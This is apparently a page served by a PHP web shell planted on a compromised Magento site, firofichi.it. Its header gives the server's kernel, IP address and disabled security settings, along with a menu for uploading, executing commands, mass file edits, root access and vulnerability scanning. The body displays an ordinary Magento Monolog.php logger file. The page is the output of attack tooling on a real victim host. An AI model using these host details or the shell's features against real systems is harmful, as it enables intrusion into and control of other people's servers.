Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 13.58.201.75 | Time @ Server : 19 Oct 2024 05:43:11
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/magento/framework/Logger/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/magento/framework/Logger/Monolog.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Logger; use Monolog\Logger; class Monolog extends Logger { /** * {@inheritdoc} */ public function __construct($name, array $handlers = [], array $processors = []) { /** * TODO: This should be eliminated with MAGETWO-53989 */ $handlers = array_values($handlers); parent::__construct($name, $handlers, $processors); } /** * Adds a log record. * * @param integer $level The logging level * @param string $message The log message * @param array $context The log context * @return Boolean Whether the record has been processed */ public function addRecord($level, $message, array $context = []) { /** * To preserve compatibility with Exception messages. * And support PSR-3 context standard. * * @link http://www.php-fig.org/psr/psr-3/#context PSR-3 context standard */ if ($message instanceof \Exception && !isset($context['exception'])) { $context['exception'] = $message; } $message = $message instanceof \Exception ? $message->getMessage() : $message; return parent::addRecord($level, $message, $context); } }